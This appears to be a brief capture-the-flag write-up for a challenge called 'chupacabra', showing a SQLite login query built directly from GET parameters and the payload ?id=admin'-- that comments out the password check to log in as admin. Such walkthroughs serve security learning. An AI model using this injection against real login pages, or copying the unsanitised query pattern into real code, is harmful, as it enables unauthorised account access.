Skip to main content

chupacabra

1

We are provided with the SQLite query:

SELECT id FROM member WHERE id='{$_GET[id]}' AND pw='{$_GET[pw]}'

In SQLite the comment character is --.

If we provide the following URI parameter:

?id=admin'--

The resultant query becomes:

SELECT id FROM member WHERE id='admin'--' AND pw=''

2